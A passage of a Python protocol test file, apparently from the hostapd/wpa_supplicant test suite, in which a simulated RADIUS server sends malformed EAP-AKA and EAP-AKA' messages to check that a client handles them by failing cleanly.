if ctx['num'] == idx:
logger.info("Test: EAP-Failure")
return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
idx += 1
if ctx['num'] == idx:
logger.info("Test: AKA Challenge with BIDDING")
return struct.pack(">BBHBBHBBH", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3 + 4,
EAP_TYPE_AKA, EAP_AKA_SUBTYPE_CHALLENGE, 0,
EAP_SIM_AT_BIDDING, 1, 0x8000)
idx += 1
if ctx['num'] == idx:
logger.info("Test: EAP-Failure")
return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Notification with no attributes")
return struct.pack(">BBHBBH", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3,
EAP_TYPE_AKA, EAP_AKA_SUBTYPE_NOTIFICATION, 0)
idx += 1
if ctx['num'] == idx:
logger.info("Test: EAP-Failure")
return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Notification indicating success, but no MAC")
return struct.pack(">BBHBBHBBH", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3 + 4,
EAP_TYPE_AKA, EAP_AKA_SUBTYPE_NOTIFICATION, 0,
EAP_SIM_AT_NOTIFICATION, 1, 32768)
idx += 1
if ctx['num'] == idx:
logger.info("Test: EAP-Failure")
return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Notification indicating success, but invalid MAC value")
return struct.pack(">BBHBBHBBHBBH4L", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3 + 4 + 20,
EAP_TYPE_AKA, EAP_AKA_SUBTYPE_NOTIFICATION, 0,
EAP_SIM_AT_NOTIFICATION, 1, 32768,
EAP_SIM_AT_MAC, 5, 0, 0, 0, 0, 0)
idx += 1
if ctx['num'] == idx:
logger.info("Test: EAP-Failure")
return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Notification indicating success with zero-key MAC")
return struct.pack(">BBHBBHBBHBBH16B", EAP_CODE_REQUEST,
ctx['id'] - 2,
4 + 1 + 3 + 4 + 20,
EAP_TYPE_AKA, EAP_AKA_SUBTYPE_NOTIFICATION, 0,
EAP_SIM_AT_NOTIFICATION, 1, 32768,
EAP_SIM_AT_MAC, 5, 0,
0xbe, 0x2e, 0xbb, 0xa9, 0xfa, 0x2e, 0x82, 0x36,
0x37, 0x8c, 0x32, 0x41, 0xb7, 0xc7, 0x58, 0xa3)
idx += 1
if ctx['num'] == idx:
logger.info("Test: EAP-Success")
return struct.pack(">BBH", EAP_CODE_SUCCESS, ctx['id'], 4)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Notification before auth")
return struct.pack(">BBHBBHBBH", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3 + 4,
EAP_TYPE_AKA, EAP_AKA_SUBTYPE_NOTIFICATION, 0,
EAP_SIM_AT_NOTIFICATION, 1, 16384)
idx += 1
if ctx['num'] == idx:
logger.info("Test: EAP-Failure")
return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Notification before auth")
return struct.pack(">BBHBBHBBH", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3 + 4,
EAP_TYPE_AKA, EAP_AKA_SUBTYPE_NOTIFICATION, 0,
EAP_SIM_AT_NOTIFICATION, 1, 16385)
idx += 1
if ctx['num'] == idx:
logger.info("Test: EAP-Failure")
return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Notification with unrecognized non-failure")
return struct.pack(">BBHBBHBBH", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3 + 4,
EAP_TYPE_AKA, EAP_AKA_SUBTYPE_NOTIFICATION, 0,
EAP_SIM_AT_NOTIFICATION, 1, 0xc000)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Notification before auth (duplicate)")
return struct.pack(">BBHBBHBBH", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3 + 4,
EAP_TYPE_AKA, EAP_AKA_SUBTYPE_NOTIFICATION, 0,
EAP_SIM_AT_NOTIFICATION, 1, 0xc000)
idx += 1
if ctx['num'] == idx:
logger.info("Test: EAP-Failure")
return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Re-authentication (unexpected) with no attributes")
return struct.pack(">BBHBBH", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3,
EAP_TYPE_AKA, EAP_AKA_SUBTYPE_REAUTHENTICATION,
0)
idx += 1
if ctx['num'] == idx:
logger.info("Test: EAP-Failure")
return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
idx += 1
if ctx['num'] == idx:
logger.info("Test: AKA Challenge with Checkcode claiming identity round was used")
return struct.pack(">BBHBBHBBH5L", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3 + 24,
EAP_TYPE_AKA, EAP_AKA_SUBTYPE_CHALLENGE, 0,
EAP_SIM_AT_CHECKCODE, 6, 0, 0, 0, 0, 0, 0)
idx += 1
if ctx['num'] == idx:
logger.info("Test: EAP-Failure")
return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Identity request ANY_ID")
return struct.pack(">BBHBBHBBH", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3 + 4,
EAP_TYPE_AKA, EAP_AKA_SUBTYPE_IDENTITY, 0,
EAP_SIM_AT_ANY_ID_REQ, 1, 0)
idx += 1
if ctx['num'] == idx:
logger.info("Test: AKA Challenge with Checkcode claiming no identity round was used")
return struct.pack(">BBHBBHBBH", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3 + 4,
EAP_TYPE_AKA, EAP_AKA_SUBTYPE_CHALLENGE, 0,
EAP_SIM_AT_CHECKCODE, 1, 0)
idx += 1
if ctx['num'] == idx:
logger.info("Test: EAP-Failure")
return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Identity request ANY_ID")
return struct.pack(">BBHBBHBBH", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3 + 4,
EAP_TYPE_AKA, EAP_AKA_SUBTYPE_IDENTITY, 0,
EAP_SIM_AT_ANY_ID_REQ, 1, 0)
idx += 1
if ctx['num'] == idx:
logger.info("Test: AKA Challenge with mismatching Checkcode value")
return struct.pack(">BBHBBHBBH5L", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3 + 24,
EAP_TYPE_AKA, EAP_AKA_SUBTYPE_CHALLENGE, 0,
EAP_SIM_AT_CHECKCODE, 6, 0, 0, 0, 0, 0, 0)
idx += 1
if ctx['num'] == idx:
logger.info("Test: EAP-Failure")
return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Re-authentication (unexpected) with Checkcode claimin identity round was used")
return struct.pack(">BBHBBHBBH5L", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3 + 24,
EAP_TYPE_AKA, EAP_AKA_SUBTYPE_REAUTHENTICATION,
0,
EAP_SIM_AT_CHECKCODE, 6, 0, 0, 0, 0, 0, 0)
idx += 1
if ctx['num'] == idx:
logger.info("Test: EAP-Failure")
return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Invalid AT_RAND length")
return struct.pack(">BBHBBHBBH", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3 + 4,
EAP_TYPE_AKA, EAP_AKA_SUBTYPE_IDENTITY, 0,
EAP_SIM_AT_RAND, 1, 0)
idx += 1
if ctx['num'] == idx:
logger.info("Test: EAP-Failure")
return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Invalid AT_AUTN length")
return struct.pack(">BBHBBHBBH", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3 + 4,
EAP_TYPE_AKA, EAP_AKA_SUBTYPE_IDENTITY, 0,
EAP_SIM_AT_AUTN, 1, 0)
idx += 1
if ctx['num'] == idx:
logger.info("Test: EAP-Failure")
return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Unencrypted AT_PADDING")
return struct.pack(">BBHBBHBBH", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3 + 4,
EAP_TYPE_AKA, EAP_AKA_SUBTYPE_IDENTITY, 0,
EAP_SIM_AT_PADDING, 1, 0)
idx += 1
if ctx['num'] == idx:
logger.info("Test: EAP-Failure")
return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Invalid AT_NONCE_MT length")
return struct.pack(">BBHBBHBBH", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3 + 4,
EAP_TYPE_AKA, EAP_AKA_SUBTYPE_IDENTITY, 0,
EAP_SIM_AT_NONCE_MT, 1, 0)
idx += 1
if ctx['num'] == idx:
logger.info("Test: EAP-Failure")
return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Invalid AT_MAC length")
return struct.pack(">BBHBBHBBH", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3 + 4,
EAP_TYPE_AKA, EAP_AKA_SUBTYPE_IDENTITY, 0,
EAP_SIM_AT_MAC, 1, 0)
idx += 1
if ctx['num'] == idx:
logger.info("Test: EAP-Failure")
return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Invalid AT_NOTIFICATION length")
return struct.pack(">BBHBBHBBHL", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3 + 8,
EAP_TYPE_AKA, EAP_AKA_SUBTYPE_IDENTITY, 0,
EAP_SIM_AT_NOTIFICATION, 2, 0, 0)
idx += 1
if ctx['num'] == idx:
logger.info("Test: EAP-Failure")
return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
idx += 1
if ctx['num'] == idx:
logger.info("Test: AT_IDENTITY overflow")
return struct.pack(">BBHBBHBBH", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3 + 4,
EAP_TYPE_AKA, EAP_AKA_SUBTYPE_IDENTITY, 0,
EAP_SIM_AT_IDENTITY, 1, 0xffff)
idx += 1
if ctx['num'] == idx:
logger.info("Test: EAP-Failure")
return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Unexpected AT_VERSION_LIST")
return struct.pack(">BBHBBHBBH", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3 + 4,
EAP_TYPE_AKA, EAP_AKA_SUBTYPE_IDENTITY, 0,
EAP_SIM_AT_VERSION_LIST, 1, 0)
idx += 1
if ctx['num'] == idx:
logger.info("Test: EAP-Failure")
return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Invalid AT_SELECTED_VERSION length")
return struct.pack(">BBHBBHBBHL", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3 + 8,
EAP_TYPE_AKA, EAP_AKA_SUBTYPE_IDENTITY, 0,
EAP_SIM_AT_SELECTED_VERSION, 2, 0, 0)
idx += 1
if ctx['num'] == idx:
logger.info("Test: EAP-Failure")
return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Unencrypted AT_COUNTER")
return struct.pack(">BBHBBHBBH", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3 + 4,
EAP_TYPE_AKA, EAP_AKA_SUBTYPE_IDENTITY, 0,
EAP_SIM_AT_COUNTER, 1, 0)
idx += 1
if ctx['num'] == idx:
logger.info("Test: EAP-Failure")
return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Unencrypted AT_COUNTER_TOO_SMALL")
return struct.pack(">BBHBBHBBH", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3 + 4,
EAP_TYPE_AKA, EAP_AKA_SUBTYPE_IDENTITY, 0,
EAP_SIM_AT_COUNTER_TOO_SMALL, 1, 0)
idx += 1
if ctx['num'] == idx:
logger.info("Test: EAP-Failure")
return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Unencrypted AT_NONCE_S")
return struct.pack(">BBHBBHBBH", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3 + 4,
EAP_TYPE_AKA, EAP_AKA_SUBTYPE_IDENTITY, 0,
EAP_SIM_AT_NONCE_S, 1, 0)
idx += 1
if ctx['num'] == idx:
logger.info("Test: EAP-Failure")
return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Invalid AT_CLIENT_ERROR_CODE length")
return struct.pack(">BBHBBHBBHL", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3 + 8,
EAP_TYPE_AKA, EAP_AKA_SUBTYPE_IDENTITY, 0,
EAP_SIM_AT_CLIENT_ERROR_CODE, 2, 0, 0)
idx += 1
if ctx['num'] == idx:
logger.info("Test: EAP-Failure")
return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Invalid AT_IV length")
return struct.pack(">BBHBBHBBH", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3 + 4,
EAP_TYPE_AKA, EAP_AKA_SUBTYPE_IDENTITY, 0,
EAP_SIM_AT_IV, 1, 0)
idx += 1
if ctx['num'] == idx:
logger.info("Test: EAP-Failure")
return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Invalid AT_ENCR_DATA length")
return struct.pack(">BBHBBHBBHL", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3 + 8,
EAP_TYPE_AKA, EAP_AKA_SUBTYPE_IDENTITY, 0,
EAP_SIM_AT_ENCR_DATA, 2, 0, 0)
idx += 1
if ctx['num'] == idx:
logger.info("Test: EAP-Failure")
return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Unencrypted AT_NEXT_PSEUDONYM")
return struct.pack(">BBHBBHBBH", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3 + 4,
EAP_TYPE_AKA, EAP_AKA_SUBTYPE_IDENTITY, 0,
EAP_SIM_AT_NEXT_PSEUDONYM, 1, 0)
idx += 1
if ctx['num'] == idx:
logger.info("Test: EAP-Failure")
return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Unencrypted AT_NEXT_REAUTH_ID")
return struct.pack(">BBHBBHBBH", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3 + 4,
EAP_TYPE_AKA, EAP_AKA_SUBTYPE_IDENTITY, 0,
EAP_SIM_AT_NEXT_REAUTH_ID, 1, 0)
idx += 1
if ctx['num'] == idx:
logger.info("Test: EAP-Failure")
return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Invalid AT_RES length")
return struct.pack(">BBHBBHBBH", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3 + 4,
EAP_TYPE_AKA, EAP_AKA_SUBTYPE_IDENTITY, 0,
EAP_SIM_AT_RES, 1, 0)
idx += 1
if ctx['num'] == idx:
logger.info("Test: EAP-Failure")
return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Invalid AT_RES length")
return struct.pack(">BBHBBHBBH5L", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3 + 24,
EAP_TYPE_AKA, EAP_AKA_SUBTYPE_IDENTITY, 0,
EAP_SIM_AT_RES, 6, 0xffff, 0, 0, 0, 0, 0)
idx += 1
if ctx['num'] == idx:
logger.info("Test: EAP-Failure")
return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Invalid AT_AUTS length")
return struct.pack(">BBHBBHBBHL", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3 + 8,
EAP_TYPE_AKA, EAP_AKA_SUBTYPE_IDENTITY, 0,
EAP_SIM_AT_AUTS, 2, 0, 0)
idx += 1
if ctx['num'] == idx:
logger.info("Test: EAP-Failure")
return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Invalid AT_CHECKCODE length")
return struct.pack(">BBHBBHBBHL", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3 + 8,
EAP_TYPE_AKA, EAP_AKA_SUBTYPE_IDENTITY, 0,
EAP_SIM_AT_CHECKCODE, 2, 0, 0)
idx += 1
if ctx['num'] == idx:
logger.info("Test: EAP-Failure")
return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Invalid AT_RESULT_IND length")
return struct.pack(">BBHBBHBBHL", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3 + 8,
EAP_TYPE_AKA, EAP_AKA_SUBTYPE_IDENTITY, 0,
EAP_SIM_AT_RESULT_IND, 2, 0, 0)
idx += 1
if ctx['num'] == idx:
logger.info("Test: EAP-Failure")
return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Unexpected AT_KDF_INPUT")
return struct.pack(">BBHBBHBBHL", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3 + 8,
EAP_TYPE_AKA, EAP_AKA_SUBTYPE_IDENTITY, 0,
EAP_SIM_AT_KDF_INPUT, 2, 0, 0)
idx += 1
if ctx['num'] == idx:
logger.info("Test: EAP-Failure")
return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Unexpected AT_KDF")
return struct.pack(">BBHBBHBBHL", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3 + 8,
EAP_TYPE_AKA, EAP_AKA_SUBTYPE_IDENTITY, 0,
EAP_SIM_AT_KDF, 2, 0, 0)
idx += 1
if ctx['num'] == idx:
logger.info("Test: EAP-Failure")
return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Invalid AT_BIDDING length")
return struct.pack(">BBHBBHBBHL", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3 + 8,
EAP_TYPE_AKA, EAP_AKA_SUBTYPE_IDENTITY, 0,
EAP_SIM_AT_BIDDING, 2, 0, 0)
idx += 1
if ctx['num'] == idx:
logger.info("Test: EAP-Failure")
return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
return None
srv = start_radius_server(aka_handler)
try:
hapd = start_ap(apdev[0]['ifname'])
for i in range(0, 49):
eap = "AKA AKA'" if i == 11 else "AKA"
dev[0].connect("eap-test", key_mgmt="WPA-EAP", scan_freq="2412",
eap=eap, identity="0232010000000000",
password="90dca4eda45b53cf0f12d7c9c3bc6a89:cb9cccc4b9258e6dca4760379fb82581:000000000123",
wait_connect=False)
ev = dev[0].wait_event(["CTRL-EVENT-EAP-PROPOSED-METHOD"],
timeout=15)
if ev is None:
raise Exception("Timeout on EAP start")
if i in [ 0, 15 ]:
time.sleep(0.1)
else:
ev = dev[0].wait_event(["CTRL-EVENT-EAP-FAILURE"],
timeout=10)
if ev is None:
raise Exception("Timeout on EAP failure")
dev[0].request("REMOVE_NETWORK all")
dev[0].dump_monitor()
finally:
stop_radius_server(srv)
def test_eap_proto_aka_prime(dev, apdev):
"""EAP-AKA' protocol tests"""
def aka_prime_handler(ctx, req):
logger.info("aka_prime_handler - RX " + req.encode("hex"))
if 'num' not in ctx:
ctx['num'] = 0
ctx['num'] = ctx['num'] + 1
if 'id' not in ctx:
ctx['id'] = 1
ctx['id'] = (ctx['id'] + 1) % 256
idx = 0
idx += 1
if ctx['num'] == idx:
logger.info("Test: Missing payload")
return struct.pack(">BBHB", EAP_CODE_REQUEST, ctx['id'],
4 + 1,
EAP_TYPE_AKA_PRIME)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Challenge with no attributes")
return struct.pack(">BBHBBH", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3,
EAP_TYPE_AKA_PRIME, EAP_AKA_SUBTYPE_CHALLENGE, 0)
idx += 1
if ctx['num'] == idx:
logger.info("Test: EAP-Failure")
return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Challenge with empty AT_KDF_INPUT")
return struct.pack(">BBHBBHBBH", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3 + 4,
EAP_TYPE_AKA_PRIME, EAP_AKA_SUBTYPE_CHALLENGE, 0,
EAP_SIM_AT_KDF_INPUT, 1, 0)
idx += 1
if ctx['num'] == idx:
logger.info("Test: EAP-Failure")
return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Challenge with AT_KDF_INPUT")
return struct.pack(">BBHBBHBBHBBBB", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3 + 8,
EAP_TYPE_AKA_PRIME, EAP_AKA_SUBTYPE_CHALLENGE, 0,
EAP_SIM_AT_KDF_INPUT, 2, 1, ord('a'), ord('b'),
ord('c'), ord('d'))
idx += 1
if ctx['num'] == idx:
logger.info("Test: EAP-Failure")
return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Challenge with duplicated KDF")
return struct.pack(">BBHBBHBBHBBBBBBHBBHBBH",
EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3 + 8 + 3 * 4,
EAP_TYPE_AKA_PRIME, EAP_AKA_SUBTYPE_CHALLENGE, 0,
EAP_SIM_AT_KDF_INPUT, 2, 1, ord('a'), ord('b'),
ord('c'), ord('d'),
EAP_SIM_AT_KDF, 1, 1,
EAP_SIM_AT_KDF, 1, 2,
EAP_SIM_AT_KDF, 1, 1)
idx += 1
if ctx['num'] == idx:
logger.info("Test: EAP-Failure")
return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Challenge with multiple KDF proposals")
return struct.pack(">BBHBBHBBHBBBBBBHBBHBBH",
EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3 + 8 + 3 * 4,
EAP_TYPE_AKA_PRIME, EAP_AKA_SUBTYPE_CHALLENGE, 0,
EAP_SIM_AT_KDF_INPUT, 2, 1, ord('a'), ord('b'),
ord('c'), ord('d'),
EAP_SIM_AT_KDF, 1, 255,
EAP_SIM_AT_KDF, 1, 254,
EAP_SIM_AT_KDF, 1, 1)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Challenge with incorrect KDF selected")
return struct.pack(">BBHBBHBBHBBBBBBHBBHBBHBBH",
EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3 + 8 + 4 * 4,
EAP_TYPE_AKA_PRIME, EAP_AKA_SUBTYPE_CHALLENGE, 0,
EAP_SIM_AT_KDF_INPUT, 2, 1, ord('a'), ord('b'),
ord('c'), ord('d'),
EAP_SIM_AT_KDF, 1, 255,
EAP_SIM_AT_KDF, 1, 255,
EAP_SIM_AT_KDF, 1, 254,
EAP_SIM_AT_KDF, 1, 1)
idx += 1
if ctx['num'] == idx:
logger.info("Test: EAP-Failure")
return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Challenge with multiple KDF proposals")
return struct.pack(">BBHBBHBBHBBBBBBHBBHBBH",
EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3 + 8 + 3 * 4,
EAP_TYPE_AKA_PRIME, EAP_AKA_SUBTYPE_CHALLENGE, 0,
EAP_SIM_AT_KDF_INPUT, 2, 1, ord('a'), ord('b'),
ord('c'), ord('d'),
EAP_SIM_AT_KDF, 1, 255,
EAP_SIM_AT_KDF, 1, 254,
EAP_SIM_AT_KDF, 1, 1)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Challenge with selected KDF not duplicated")
return struct.pack(">BBHBBHBBHBBBBBBHBBHBBH",
EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3 + 8 + 3 * 4,
EAP_TYPE_AKA_PRIME, EAP_AKA_SUBTYPE_CHALLENGE, 0,
EAP_SIM_AT_KDF_INPUT, 2, 1, ord('a'), ord('b'),
ord('c'), ord('d'),
EAP_SIM_AT_KDF, 1, 1,
EAP_SIM_AT_KDF, 1, 255,
EAP_SIM_AT_KDF, 1, 254)
idx += 1
if ctx['num'] == idx:
logger.info("Test: EAP-Failure")
return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Challenge with multiple KDF proposals")
return struct.pack(">BBHBBHBBHBBBBBBHBBHBBH",
EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3 + 8 + 3 * 4,
EAP_TYPE_AKA_PRIME, EAP_AKA_SUBTYPE_CHALLENGE, 0,
EAP_SIM_AT_KDF_INPUT, 2, 1, ord('a'), ord('b'),
ord('c'), ord('d'),
EAP_SIM_AT_KDF, 1, 255,
EAP_SIM_AT_KDF, 1, 254,
EAP_SIM_AT_KDF, 1, 1)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Challenge with selected KDF duplicated (missing MAC, RAND, AUTN)")
return struct.pack(">BBHBBHBBHBBBBBBHBBHBBHBBH",
EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3 + 8 + 4 * 4,
EAP_TYPE_AKA_PRIME, EAP_AKA_SUBTYPE_CHALLENGE, 0,
EAP_SIM_AT_KDF_INPUT, 2, 1, ord('a'), ord('b'),
ord('c'), ord('d'),
EAP_SIM_AT_KDF, 1, 1,
EAP_SIM_AT_KDF, 1, 255,
EAP_SIM_AT_KDF, 1, 254,
EAP_SIM_AT_KDF, 1, 1)
idx += 1
if ctx['num'] == idx:
logger.info("Test: EAP-Failure")
return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Challenge with multiple unsupported KDF proposals")
return struct.pack(">BBHBBHBBHBBBBBBHBBH",
EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3 + 8 + 2 * 4,
EAP_TYPE_AKA_PRIME, EAP_AKA_SUBTYPE_CHALLENGE, 0,
EAP_SIM_AT_KDF_INPUT, 2, 1, ord('a'), ord('b'),
ord('c'), ord('d'),
EAP_SIM_AT_KDF, 1, 255,
EAP_SIM_AT_KDF, 1, 254)
idx += 1
if ctx['num'] == idx:
logger.info("Test: EAP-Failure")
return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Challenge with multiple KDF proposals")
return struct.pack(">BBHBBHBBHBBBBBBHBBHBBH",
EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3 + 8 + 3 * 4,
EAP_TYPE_AKA_PRIME, EAP_AKA_SUBTYPE_CHALLENGE, 0,
EAP_SIM_AT_KDF_INPUT, 2, 1, ord('a'), ord('b'),
ord('c'), ord('d'),
EAP_SIM_AT_KDF, 1, 255,
EAP_SIM_AT_KDF, 1, 254,
EAP_SIM_AT_KDF, 1, 1)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Challenge with invalid MAC, RAND, AUTN values)")
return struct.pack(">BBHBBHBBHBBBBBBHBBHBBHBBHBBH4LBBH4LBBH4L",
EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3 + 8 + 4 * 4 + 20 + 20 + 20,
EAP_TYPE_AKA_PRIME, EAP_AKA_SUBTYPE_CHALLENGE, 0,
EAP_SIM_AT_KDF_INPUT, 2, 1, ord('a'), ord('b'),
ord('c'), ord('d'),
EAP_SIM_AT_KDF, 1, 1,
EAP_SIM_AT_KDF, 1, 255,
EAP_SIM_AT_KDF, 1, 254,
EAP_SIM_AT_KDF, 1, 1,
EAP_SIM_AT_MAC, 5, 0, 0, 0, 0, 0,
EAP_SIM_AT_RAND, 5, 0, 0, 0, 0, 0,
EAP_SIM_AT_AUTN, 5, 0, 0, 0, 0, 0)
idx += 1
if ctx['num'] == idx:
logger.info("Test: EAP-Failure")
return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Challenge - AMF separation bit not set)")
return struct.pack(">BBHBBHBBHBBBBBBHBBH4LBBH4LBBH4L",
EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3 + 8 + 4 + 20 + 20 + 20,
EAP_TYPE_AKA_PRIME, EAP_AKA_SUBTYPE_CHALLENGE, 0,
EAP_SIM_AT_KDF_INPUT, 2, 1, ord('a'), ord('b'),
ord('c'), ord('d'),
